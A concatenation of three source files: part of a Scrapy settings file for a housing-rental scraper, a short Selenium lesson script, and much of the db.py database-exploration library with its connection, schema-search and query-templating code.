'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR '
'3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; '
'.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR '
'3.0.04506.30)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 ('
'Change: 287 c9dfb30)',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0',
'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 '
'Safari/535.20',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 '
'Safari/605.1.15',
'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52',
)
ROBOTSTXT_OBEY = False
DOWNLOAD_DELAY = 10
CONCURRENT_REQUESTS_PER_DOMAIN = 1
COOKIES_ENABLED = False
TELNETCONSOLE_ENABLED = False
DEFAULT_REQUEST_HEADERS = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en',
}
SPIDER_MIDDLEWARES = {
}
DOWNLOADER_MIDDLEWARES = {
'house_renting.middlewares.HouseRentingAgentMiddleware': 100,
'house_renting.middlewares.HouseRentingProxyMiddleware': 200,
'house_renting.middlewares.HouseRentingRetryMiddleware': 300,
'scrapy.downloadermiddlewares.retry.RetryMiddleware': None,
'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None,
}
ITEM_PIPELINES = {
'house_renting.pipelines.HouseRentingPipeline': 100,
'house_renting.pipelines.DuplicatesPipeline': 200,
'scrapy.pipelines.images.ImagesPipeline': 300,
'house_renting.pipelines.ESPipeline': 400,
}
IMAGES_STORE = '/house-renting/data/images'
MEDIA_ALLOW_REDIRECTS = True
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
AUTOTHROTTLE_ENABLED = True
# The initial download delay
AUTOTHROTTLE_START_DELAY = 10
# The maximum download delay to be set in case of high latencies
AUTOTHROTTLE_MAX_DELAY = 10
# The average number of requests Scrapy should be sending in parallel to
# each remote server
AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0
# Enable showing throttling stats for every response received:
AUTOTHROTTLE_DEBUG = True
DOWNLOAD_TIMEOUT = 30
RETRY_TIMES = 3
LOG_LEVEL = 'INFO'
SPIDER_SETTINGS = {
'lianjia': {
'cities': lianjia.cities,
'available_cities': lianjia.available_cities,
'available_cities_map': lianjia.available_cities_map,
},
'58': {
'cities': a58.cities,
'available_cities': a58.available_cities,
'available_cities_map': a58.available_cities_map,
},
}
# Elasticsearch nodes; multiple nodes (a cluster) can be configured. Defaults to None, in which case results are not stored in ES.
ELASTIC_HOSTS = [
{'host': 'elastic', 'port': 9200},
]
REDIS_HOST = 'redis'  # Defaults to None, in which case deduplication is disabled
REDIS_PORT = 6379  # Defaults to 6379
|
codigo_das_aulas/aula_10/aula_10_08.py | VeirichR/curso-python-selenium | 234 | 12797499 | <reponame>VeirichR/curso-python-selenium<filename>codigo_das_aulas/aula_10/aula_10_08.py
from selenium.webdriver import Firefox
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.expected_conditions import (
url_contains,
url_matches
)
url = 'https://selenium.dunossauro.live/aula_10_c.html'
browser = Firefox()
browser.get(url)
wdw = WebDriverWait(browser, 10)
links = browser.find_elements_by_css_selector('.body_b a')
links[1].click()
wdw.until(
url_contains('selenium'),
)
wdw.until(
url_matches('http.*live'),
)
|
IronManFly/storage/db/db.py | leepand/IronManFly | 599 | 12797505 | <filename>IronManFly/storage/db/db.py
import threading
import glob
import gzip
try:
from StringIO import StringIO # Python 2.7
except:
from io import StringIO # Python 3.3+
import uuid
import re
import os
import sys
from collections import defaultdict
import pandas as pd
import pybars
from .column import Column, ColumnSet
from .table import Table, TableSet
from .s3 import S3
from .utils import profile_path, load_profile, load_from_json, dump_to_json
from .query_templates import query_templates
# attempt to import the relevant database libraries
# TODO: maybe add warnings?
try:
import psycopg2 as pg
HAS_PG = True
except ImportError:
HAS_PG = False
try:
import MySQLdb
mysql_connect = MySQLdb.connect
HAS_MYSQL = True
except ImportError:
try:
import pymysql
mysql_connect = pymysql.connect
HAS_MYSQL = True
except ImportError:
HAS_MYSQL = False
try:
import sqlite3 as sqlite
HAS_SQLITE = True
except ImportError:
HAS_SQLITE = False
try:
import pyodbc as pyo
HAS_ODBC = True
except ImportError:
try:
import pypyodbc as pyo
HAS_ODBC = True
except ImportError:
HAS_ODBC = False
try:
import pymssql
HAS_PYMSSQL = True
except ImportError:
HAS_PYMSSQL = False
DBPY_PROFILE_ID = ".db.py_"
S3_PROFILE_ID = ".db.py_s3_"
class DB(object):
"""
Utility for exploring and querying a database.
Parameters
----------
username: str
Your username for the database
password: str
Your password for the database
hostname: str
Hostname your database is running on (i.e. "localhost", "10.20.1.248")
port: int
Port the database is running on. defaults to default port for db.
portgres: 5432
redshift: 5439
mysql: 3306
sqlite: n/a
mssql: 1433
filename: str
path to sqlite database
dbname: str
Name of the database
schemas: list
List of schemas to include. Defaults to all.
profile: str
Preconfigured database credentials / profile for how you like your queries
exclude_system_tables: bool
Whether or not to include "system" tables (the ones that the database needs
in order to operate). This includes things like schema definitions. Most of
you probably don't need this, but if you're a db admin you might actually
want to query the system tables.
limit: int, None
Default number of records to return in a query. This is used by the DB.query
method. You can override it by adding limit={X} to the `query` method, or
by passing an argument to `DB()`. None indicates that there will be no
limit (That's right, you'll be limitless. Bradley Cooper style.)
keys_per_column: int, None
Default number of keys to display in the foreign and reference keys.
This is used to control the rendering of PrettyTable a bit. None means
that you'll have verrrrrrrry wide columns in some cases.
driver: str, None
Driver for mssql/pyodbc connections.
Examples
--------
db = DB(dbname="AdventureWorks2012", dbtype="mssql", driver="{FreeTDS}")
from db import DB
try:
__import__('imp').find_module('psycopg2')
db = DB(username="kermit", password="<PASSWORD>", hostname="themuppets.com", port=5432, dbname="muppets", dbtype="postgres")
db = DB(username="dev", hostname="localhost", port=5432, dbname="devdb", dbtype="postgres")
db = DB(username="fozzybear", password="<PASSWORD>", hostname="ec2.523.24.131", port=5432, dbname="muppets_redshift", dbtype="redshift")
except ImportError:
pass
try:
__import__('imp').find_module('pymysql')
db = DB(username="root", hostname="localhost", dbname="employees", dbtype="mysql")
db = DB(filename="/path/to/mydb.sqlite", dbtype="sqlite")
except ImportError:
pass
"""
def __init__(self, username=None, password=None, hostname="localhost",
port=None, filename=None, dbname=None, dbtype=None, schemas=None,
profile="default", exclude_system_tables=True, limit=1000,
keys_per_column=None, driver=None, cache=False):
if port is None:
if dbtype=="postgres":
port = 5432
elif dbtype=="redshift":
port = 5439
elif dbtype=="mysql":
port = 3306
elif dbtype=="sqlite":
port = None
elif dbtype=="mssql":
port = 1433
elif profile is not None:
pass
else:
raise Exception("Database type not specified! Must select one of: postgres, sqlite, mysql, mssql, or redshift")
self._use_cache = cache
if dbtype not in ("sqlite", "mssql") and username is None:
self.load_credentials(profile)
if cache:
self._metadata_cache = self.load_metadata(profile)
elif dbtype=="sqlite" and filename is None:
self.load_credentials(profile)
if cache:
self._metadata_cache = self.load_metadata(profile)
else:
self.username = username
self.password = password
self.hostname = hostname
self.port = port
self.filename = filename
self.dbname = dbname
self.dbtype = dbtype
self.schemas = schemas
self.limit = limit
self.keys_per_column = keys_per_column
self.driver = driver
if self.dbtype is None:
raise Exception("Database type not specified! Must select one of: postgres, sqlite, mysql, mssql, or redshift")
self._query_templates = query_templates.get(self.dbtype).queries
if self.dbtype=="postgres" or self.dbtype=="redshift":
if not HAS_PG:
raise Exception("Couldn't find psycopg2 library. Please ensure it is installed")
self.con = pg.connect(user=self.username, password=self.password,
host=self.hostname, port=self.port, dbname=self.dbname)
self.con.autocommit = True
self.cur = self.con.cursor()
elif self.dbtype=="sqlite":
if not HAS_SQLITE:
raise Exception("Couldn't find sqlite library. Please ensure it is installed")
self.con = sqlite.connect(self.filename)
self.cur = self.con.cursor()
self._create_sqlite_metatable()
elif self.dbtype=="mysql":
if not HAS_MYSQL:
raise Exception("Couldn't find MySQLdb or pymysql library. Please ensure it is installed")
creds = {}
for arg in ["username", "password", "hostname", "port", "dbname"]:
if getattr(self, arg):
value = getattr(self, arg)
if arg=="username":
arg = "user"
elif arg=="password":
arg = "<PASSWORD>"
elif arg=="dbname":
arg = "db"
elif arg=="hostname":
arg = "host"
creds[arg] = value
self.con = mysql_connect(**creds)
self.con.autocommit(True)
self.cur = self.con.cursor()
elif self.dbtype=="mssql":
if not HAS_ODBC and not HAS_PYMSSQL:
raise Exception("Couldn't find pyodbc or pymssql libraries. Please ensure one of them is installed")
if HAS_ODBC:
base_con = "Driver={driver};Server={server};Database={database};".format(
driver=self.driver or "SQL Server",
server=self.hostname or "localhost",
database=self.dbname or ''
)
conn_str = ((self.username and self.password) and "{}{}".format(
base_con,
"User Id={username};Password={password};".format(
username=self.username,
password=self.password
)
) or "{}{}".format(base_con, "Trusted_Connection=Yes;"))
try:
self.con = pyo.connect(conn_str)
self.cur = self.con.cursor()
except:
self.con = pyo.connect(
driver=self.driver or "SQL Server",
server=self.hostname or "localhost",
port=self.port,
database=self.dbname or '',
uid=self.username,
pwd=<PASSWORD>)
self.cur = self.con.cursor()
elif HAS_PYMSSQL:
if '\\' in self.hostname:
hostname = self.hostname
elif hasattr(self, 'port'):
hostname = '{0}:{1}'.format(self.hostname, self.port)
else:
hostname = self.hostname
self.con = pymssql.connect(host=hostname,
user=self.username,
password=<PASSWORD>,
database=self.dbname)
self.cur = self.con.cursor()
self._tables = TableSet([])
self._exclude_system_tables = exclude_system_tables
self.handlebars = pybars.Compiler()
@property
def tables(self):
"""A lazy loaded reference to the table metadata for the DB."""
if len(self._tables) == 0:
self.refresh_schema(self._exclude_system_tables, self._use_cache)
return self._tables
def __str__(self):
return "DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}".format(
dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname)
def __repr__(self):
return self.__str__()
def __del__(self):
del self.cur
del self.con
def load_credentials(self, profile="default"):
"""
Loads credentials for a given profile. Profiles are stored in
~/.db.py_{profile_name} and are a base64 encoded JSON file. This is not
to say this is a secure way to store sensitive data, but it will probably
stop your little sister from stealing your passwords.
Parameters
----------
profile: str
(optional) identifier/name for your database (i.e. "dw", "prod")
"""
f = profile_path(DBPY_PROFILE_ID, profile)
if f:
creds = load_from_json(f)
self.username = creds.get('username')
self.password = creds.get('password')
self.hostname = creds.get('hostname')
self.port = creds.get('port')
self.filename = creds.get('filename')
self.dbname = creds.get('dbname')
self.dbtype = creds.get('dbtype')
self.schemas = creds.get('schemas')
self.limit = creds.get('limit')
self.keys_per_column = creds.get('keys_per_column')
else:
raise Exception("Credentials not configured!")
def save_credentials(self, profile="default"):
"""
Save your database credentials so you don't have to keep them in your script.
Parameters
----------
profile: str
(optional) identifier/name for your database (i.e. "dw", "prod")
from db import DB
import pymysql
db = DB(username="hank", password="<PASSWORD>", hostname="prod.mardukas.com", dbname="bar", dbtype="mysql")
db.save_credentials(profile="production")
db = DB(username="hank", password="<PASSWORD>", hostname="staging.mardukas.com", dbname="bar", dbtype="mysql")
db.save_credentials(profile="staging")
db = DB(profile="staging")
>>> from db import DemoDB
>>> db = DemoDB()
>>> db.save_credentials(profile='test')
"""
f = profile_path(DBPY_PROFILE_ID, profile)
dump_to_json(f, self.credentials)
@staticmethod
def load_metadata(profile="default"):
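"""Load cached table metadata (if any) from a saved db.py profile."""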
f = profile_path(DBPY_PROFILE_ID, profile)
if f:
prof = load_from_json(f)
return prof.get('tables', None)
def save_metadata(self, profile="default"):
"""Save the database credentials, plus the database properties to your db.py profile."""
if len(self.tables) > 0:
f = profile_path(DBPY_PROFILE_ID, profile)
dump_to_json(f, self.to_dict())
@property
def credentials(self):
"""Dict representation of all credentials for the database."""
if self.filename:
db_filename = os.path.join(os.getcwd(), self.filename)
else:
db_filename = None
return {
"username": self.username,
"password": self.password,
"hostname": self.hostname,
"port": self.port,
"filename": db_filename,
"dbname": self.dbname,
"dbtype": self.dbtype,
"schemas": self.schemas,
"limit": self.limit,
"keys_per_column": self.keys_per_column,
}
def find_table(self, search):
"""
Aggressively search through your database's schema for a table.
Parameters
-----------
search: str
glob pattern for what you're looking for
Examples
----------
>>> from db import DemoDB
>>> db = DemoDB()
>>> db.find_table("A*")
+--------+--------------------------+
| Table | Columns |
+--------+--------------------------+
| Album | AlbumId, Title, ArtistId |
| Artist | ArtistId, Name |
+--------+--------------------------+
>>> results = db.find_table("tmp*") # returns all tables prefixed w/ tmp
>>> results = db.find_table("prod_*") # returns all tables prefixed w/ prod_
>>> results = db.find_table("*Invoice*") # returns all tables containing trans
>>> results = db.find_table("*") # returns everything
"""
tables = []
for table in self.tables:
if glob.fnmatch.fnmatch(table.name, search):
tables.append(table)
return TableSet(tables)
def find_column(self, search, data_type=None):
"""
Aggressively search through your database's schema for a column.
Parameters
-----------
search: str
glob pattern for what you're looking for
data_type: str, list
(optional) specify which data type(s) you want to return
Examples
----------
>>> from db import DemoDB
>>> db = DemoDB()
>>> len(db.find_column("Name").columns)
5
>>> len(db.find_column("*Id").columns)
20
>>> len(db.find_column("*Address*").columns)
3
>>> len(db.find_column("*Address*", data_type="NVARCHAR(70)").columns)
3
>>> len(db.find_column("*e*", data_type=["NVARCHAR(70)", "INTEGER"]).columns)
17
-= Should sort in some way for all those doctests to be viable...
-= if not, there's always a random issue where rows are not in the same order, making doctest fail.
db.find_column("Name") # returns all columns named "Name"
+-----------+-------------+---------------+
| Table | Column Name | Type |
+-----------+-------------+---------------+
| Artist | Name | NVARCHAR(120) |
| Genre | Name | NVARCHAR(120) |
| MediaType | Name | NVARCHAR(120) |
| Playlist | Name | NVARCHAR(120) |
| Track | Name | NVARCHAR(200) |
+-----------+-------------+---------------+
db.find_column("*Id") # returns all columns ending w/ Id
+---------------+---------------+---------+
| Table | Column Name | Type |
+---------------+---------------+---------+
| Album | AlbumId | INTEGER |
| Album | ArtistId | INTEGER |
| Artist | ArtistId | INTEGER |
| Customer | SupportRepId | INTEGER |
| Customer | CustomerId | INTEGER |
| Employee | EmployeeId | INTEGER |
| Genre | GenreId | INTEGER |
| Invoice | InvoiceId | INTEGER |
| Invoice | CustomerId | INTEGER |
| InvoiceLine | TrackId | INTEGER |
| InvoiceLine | InvoiceLineId | INTEGER |
| InvoiceLine | InvoiceId | INTEGER |
| MediaType | MediaTypeId | INTEGER |
| Playlist | PlaylistId | INTEGER |
| PlaylistTrack | TrackId | INTEGER |
| PlaylistTrack | PlaylistId | INTEGER |
| Track | TrackId | INTEGER |
| Track | AlbumId | INTEGER |
| Track | MediaTypeId | INTEGER |
| Track | GenreId | INTEGER |
+---------------+---------------+---------+
db.find_column("*Address*") # returns all columns containing Address
+----------+----------------+--------------+
| Table | Column Name | Type |
+----------+----------------+--------------+
| Customer | Address | NVARCHAR(70) |
| Employee | Address | NVARCHAR(70) |
| Invoice | BillingAddress | NVARCHAR(70) |
+----------+----------------+--------------+
db.find_column("*Address*", data_type="NVARCHAR(70)") # returns all columns containing Address that are varchars
+----------+----------------+--------------+
| Table | Column Name | Type |
+----------+----------------+--------------+
| Customer | Address | NVARCHAR(70) |
| Employee | Address | NVARCHAR(70) |
| Invoice | BillingAddress | NVARCHAR(70) |
+----------+----------------+--------------+
db.find_column("*e*", data_type=["NVARCHAR(70)", "INTEGER"]) # returns all columns have an "e" and are NVARCHAR(70)S or INTEGERS
+-------------+----------------+--------------+
| Table | Column Name | Type |
+-------------+----------------+--------------+
| Customer | Address | NVARCHAR(70) |
| Customer | SupportRepId | INTEGER |
| Customer | CustomerId | INTEGER |
| Employee | ReportsTo | INTEGER |
| Employee | EmployeeId | INTEGER |
| Employee | Address | NVARCHAR(70) |
| Genre | GenreId | INTEGER |
| Invoice | InvoiceId | INTEGER |
| Invoice | CustomerId | INTEGER |
| Invoice | BillingAddress | NVARCHAR(70) |
| InvoiceLine | InvoiceLineId | INTEGER |
| InvoiceLine | InvoiceId | INTEGER |
| MediaType | MediaTypeId | INTEGER |
| Track | MediaTypeId | INTEGER |
| Track | Milliseconds | INTEGER |
| Track | GenreId | INTEGER |
| Track | Bytes | INTEGER |
+-------------+----------------+--------------+
"""
if isinstance(data_type, str):
data_type = [data_type]
cols = []
for table in self.tables:
for col in vars(table):
if glob.fnmatch.fnmatch(col, search):
if data_type and isinstance(getattr(table, col), Column) and getattr(table, col).type not in data_type:
continue
if isinstance(getattr(table, col), Column):
cols.append(getattr(table, col))
return ColumnSet(cols)
def _assign_limit(self, q, limit=1000):
# postgres, mysql, & sqlite
if self.dbtype in ["postgres", "redshift", "sqlite", "mysql"]:
if limit:
q = q.rstrip().rstrip(";")
q = "select * from ({q}) q limit {limit}".format(q=q, limit=limit)
return q
# mssql
else:
if limit:
q = "select top {limit} * from ({q}) q".format(limit=limit, q=q)
return q
def _apply_handlebars(self, q, data, union=True):
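# render the handlebars template(s); a list of dicts produces one rendered
# query per item, joined with "UNION ALL" when union=True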
if (sys.version_info < (3, 0)):
q = unicode(q)
template = self.handlebars.compile(q)
if isinstance(data, list):
query = [template(item) for item in data]
query = [str(item) for item in query]
if union==True:
query = "\nUNION ALL".join(query)
else:
query = "\n".join(query)
elif isinstance(data, dict):
query = template(data)
query = str(query)
else:
return q
return query
def query(self, q, data=None, union=True, limit=None):
"""
Query your database with a raw string.
Parameters
----------
q: str
Query string to execute
data: list, dict
Optional argument for handlebars-queries. Data will be passed to the
template and rendered using handlebars.
union: bool
Whether or not "UNION ALL" handlebars templates. This will return
any handlebars queries as a single data frame.
limit: int
Number of records to return
Examples
--------
>>> from db import DemoDB
>>> db = DemoDB()
db.query("select * from Track").head(2)
TrackId Name AlbumId MediaTypeId \\\r
0 1 For Those About To Rock (We Salute You) 1 1
1 2 Balls to the Wall 2 2
<BLANKLINE>
GenreId Composer Milliseconds Bytes \\\r
0 1 <NAME>, <NAME>, <NAME> 343719 11170334
1 1 None 342562 5510424
<BLANKLINE>
UnitPrice
0 0.99
1 0.99
db.query("select * from Track", limit=10)
TrackId Name AlbumId MediaTypeId \
0 1 For Those About To Rock (We Salute You) 1 1
1 2 Balls to the Wall 2 2
2 3 Fast As a Shark 3 2
3 4 Restless and Wild 3 2
4 5 Princess of the Dawn 3 2
5 6 Put The Finger On You 1 1
6 7 Let's Get It Up 1 1
7 8 Inject The Venom 1 1
8 9 Snowballed 1 1
9 10 Evil Walks 1 1
GenreId Composer Milliseconds \
0 1 <NAME>, <NAME>, <NAME> 343719
1 1 None 342562
2 1 <NAME>, <NAME>, U. Dirkscneider & W. Ho... 230619
3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 252051
4 1 Deaffy & R.A. Smith-Diesel 375418
5 1 <NAME>, <NAME>, <NAME> 205662
6 1 <NAME>, <NAME>, <NAME> 233926
7 1 <NAME>, <NAME>, <NAME> 210834
8 1 <NAME>, <NAME>, <NAME> 203102
9 1 <NAME>, <NAME>, <NAME> 263497
Bytes UnitPrice
0 11170334 0.99
1 5510424 0.99
2 3990994 0.99
3 4331779 0.99
4 6290521 0.99
5 6713451 0.99
6 7636561 0.99
7 6852860 0.99
8 6599424 0.99
9 8611245 0.99
>>> q = '''
... SELECT
... a.Title,
... t.Name,
... t.UnitPrice
... FROM
... Album a
... INNER JOIN
... Track t
... on a.AlbumId = t.AlbumId;
... '''
>>> len(db.query(q))
3503
db.query(q, limit=10)
Title \
0 For Those About To Rock We Salute You
1 Balls to the Wall
2 Restless and Wild
3 Restless and Wild
4 Restless and Wild
5 For Those About To Rock We Salute You
6 For Those About To Rock We Salute You
7 For Those About To Rock We Salute You
8 For Those About To Rock We Salute You
9 For Those About To Rock We Salute You
Name UnitPrice
0 For Those About To Rock (We Salute You) 0.99
1 Balls to the Wall 0.99
2 Fast As a Shark 0.99
3 Restless and Wild 0.99
4 Princess of the Dawn 0.99
5 Put The Finger On You 0.99
6 Let's Get It Up 0.99
7 Inject The Venom 0.99
8 Snowballed 0.99
9 Evil Walks 0.99
>>> template = '''
... SELECT
... '{{ name }}' as table_name,
... COUNT(*) as cnt
... FROM
... {{ name }}
... GROUP BY
... table_name
... '''
>>> data = [
... {"name": "Album"},
... {"name": "Artist"},
... {"name": "Track"}
... ]
>>>
db.query(template, data=data)
table_name cnt
0 Album 347
1 Artist 275
2 Track 3503
>>> q = '''
... SELECT
... {{#cols}}
... {{#if @last}}
... {{ . }}
... {{else}}
... {{ . }} ,
... {{/if}}
... {{/cols}}
... FROM
... Album;
... '''
>>> data = {"cols": ["AlbumId", "Title", "ArtistId"]}
>>> len(db.query(q, data=data, union=False))
347
db.query(q, data=data, union=False)
AlbumId Title ArtistId
0 1 For Those About To Rock We Salute You 1
1 2 Balls to the Wall 2
2 3 Restless and Wild 2
3 4 Let There Be Rock 1
4 5 Big Ones 3
"""
if data:
q = self._apply_handlebars(q, data, union)
if limit:
q = self._assign_limit(q, limit)
return pd.read_sql(q, self.con)
def query_from_file(self, filename, data=None, union=True, limit=None):
"""
Query your database from a file.
Parameters
----------
filename: str
A SQL script
data: list, dict
Optional argument for handlebars-queries. Data will be passed to the
template and rendered using handlebars.
union: bool
Whether or not "UNION ALL" handlebars templates. This will return
any handlebars queries as a single data frame.
limit: int
Number of records to return
Examples
--------
>>> from db import DemoDB
>>> db = DemoDB()
>>> q = '''
... SELECT
... a.Title,
... t.Name,
... t.UnitPrice
... FROM
... Album a
... INNER JOIN
... Track t
... on a.AlbumId = t.AlbumId;
... '''
>>> with open("db/tests/myscript.sql", "w") as f:
... f.write(q)
109
>>> len(db.query_from_file("db/tests/myscript.sql", limit=10))
10
db.query_from_file("db/tests/myscript.sql", limit=10)
Title \
0 For Those About To Rock We Salute You
1 Balls to the Wall
2 Restless and Wild
3 Restless and Wild
4 Restless and Wild
5 For Those About To Rock We Salute You
6 For Those About To Rock We Salute You
7 For Those About To Rock We Salute You
8 For Those About To Rock We Salute You
9 For Those About To Rock We Salute You
Name UnitPrice
0 For Those About To Rock (We Salute You) 0.99
1 Balls to the Wall 0.99
2 Fast As a Shark 0.99
3 Restless and Wild 0.99
4 Princess of the Dawn 0.99
5 Put The Finger On You 0.99
6 Let's Get It Up 0.99
7 Inject The Venom 0.99
8 Snowballed 0.99
9 Evil Walks 0.99
"""
with open(filename) as fp:
q = fp.read()
return self.query(q, data=data, union=union, limit=limit)
def _create_sqlite_metatable(self):
"""
SQLite doesn't come with any metatables (at least ones that fit into our
framework), so we're going to create them.
"""
sys.stderr.write("Indexing schema. This will take a second...")
rows_to_insert = []
tables = [row[0] for row in self.cur.execute("select name from sqlite_master where type='table';")]
for table in tables:
for row in self.cur.execute("pragma table_info('{0}')".format(table)):
rows_to_insert.append((table, row[1], row[2]))
# temp table for table and column names
self.cur.execute("drop table if exists tmp_dbpy_schema;")
self.cur.execute("create temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);")
for row in rows_to_insert:
self.cur.execute("insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');".format(*row))
self.cur.execute("SELECT name, sql FROM sqlite_master where sql like '%REFERENCES%';")
# temp table for foreign key relationships
self.cur.execute("drop table if exists tmp_dbpy_foreign_keys;")
self.cur.execute("create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column varchar);")
foreign_keys = []
self.cur.execute("SELECT name, sql FROM sqlite_master ;")
for (table_name, sql) in self.cur:
rgx = "FOREIGN KEY \(\[(.*)\]\) REFERENCES \[(.*)\] \(\[(.*)\]\)"
if sql is None:
continue
for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql):
foreign_keys.append((table_name, column_name, foreign_table, foreign_key))
for row in foreign_keys:
sql_insert = "insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');"
self.cur.execute(sql_insert.format(*row))
self.con.commit()
sys.stderr.write("finished!\n")
def refresh_schema(self, exclude_system_tables=True, use_cache=False):
"""
Pulls your database's schema again and looks for any new tables and
columns.
"""
col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache)
tables = self._gen_tables_from_col_tuples(col_meta)
# Three modes for refreshing schema
# 1. load directly from cache
# 2. use a single query for getting all key relationships
# 3. use the naive approach
if use_cache:
# generate our Tables, and load them into a TableSet
self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t],
keys_per_column=self.keys_per_column,
foreign_keys=table_meta[t]['foreign_keys']['columns'],
ref_keys=table_meta[t]['ref_keys']['columns'])
for t in sorted(tables.keys())])
# optimize the foreign/ref key query by doing it one time, database-wide, if query is available
elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str):
self.cur.execute(self._query_templates['system']['foreign_keys_for_db'])
table_db_foreign_keys = defaultdict(list)
for rel in self.cur:
# second value in relationship tuple is the table name
table_db_foreign_keys[rel[1]].append(rel)
self.cur.execute(self._query_templates['system']['ref_keys_for_db'])
table_db_ref_keys = defaultdict(list)
for rel in self.cur:
# second value in relationship tuple is the table name
table_db_ref_keys[rel[1]].append(rel)
# generate our Tables, and load them into a TableSet
self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t],
keys_per_column=self.keys_per_column,
foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t])
for t in sorted(tables.keys())])
elif not use_cache:
self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t],
keys_per_column=self.keys_per_column) for t in sorted(tables.keys())])
sys.stderr.write("done!\n")
def _get_db_metadata(self, exclude_system_tables, use_cache):
col_meta = []
table_meta = {}
# pull out column metadata for all tables as list of tuples if told to use cached metadata
if use_cache and self._metadata_cache:
sys.stderr.write("Loading cached metadata. Please wait...")
for table in self._metadata_cache:
# table metadata
table_meta[table['name']] = {k: table[k] for k in ('schema', 'name', 'foreign_keys', 'ref_keys')}
# col metadata: format as list of tuples, to match how normal loading is performed
for col in table['columns']:
col_meta.append((col['schema'], col['table'], col['name'], col['type']))
else:
sys.stderr.write("Refreshing schema. Please wait...")
if self.schemas is not None and isinstance(self.schemas, list) and 'schema_specified' in \
self._query_templates['system']:
schemas_str = ','.join([repr(schema) for schema in self.schemas])
q = self._query_templates['system']['schema_specified'] % schemas_str
elif exclude_system_tables:
q = self._query_templates['system']['schema_no_system']
else:
q = self._query_templates['system']['schema_with_system']
self.cur.execute(q)
col_meta = self.cur
return col_meta, table_meta
def _gen_tables_from_col_tuples(self, cols):
tables = {}
# generate our Columns, and attach to each table to the table name in dict
for (table_schema, table_name, column_name, data_type) in cols:
if table_name not in tables:
tables[table_name] = []
tables[table_name].append(Column(self.con, self._query_templates, table_schema,
table_name, column_name, data_type, self.keys_per_column))
return tables
def _try_command(self, cmd):
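"""Execute a statement, printing any error and rolling back instead of raising."""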
try:
self.cur.execute(cmd)
except Exception as e:
print ("Error executing command:")
print ("\t '{0}'".format(cmd))
print ("Exception: {0}".format(e))
self.con.rollback()
def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000,
AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None,
print_sql=False, bucket_location=None, s3_bucket=None):
"""
Upload a dataframe to redshift via s3.
Parameters
----------
name: str
name for your shiny new table
df: DataFrame
data frame you want to save to the db
drop_if_exists: bool (False)
whether you'd like to drop the table if it already exists
chunk_size: int (10000)
Number of rows per DataFrame chunk to upload and COPY from S3. Upload
speed is *much* faster if the number of chunks is a multiple of the
cluster's slice count. Ex: DW1.XL nodes have 2 slices per node, so if
running 2 nodes you will want the data split into 4, 8, etc. chunks
AWS_ACCESS_KEY: str
your aws access key. if this is None, the function will try
and grab AWS_ACCESS_KEY from your environment variables
AWS_SECRET_KEY: str
your aws secret key. if this is None, the function will try
and grab AWS_SECRET_KEY from your environment variables
s3: S3
alternative to using keys, you can use an S3 object
print_sql: bool (False)
option for printing sql statement that will be executed
bucket_location: boto.s3.connection.Location
a specific AWS location in which to create the temporary transfer s3
bucket. This should match your redshift cluster's region.
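s3_bucket: str
(optional) name of an existing s3 bucket to use for the transfer instead
of creating (and afterwards deleting) a temporary db.py bucket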
Examples
--------
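# Illustrative sketch only (not executed); the connection details and the
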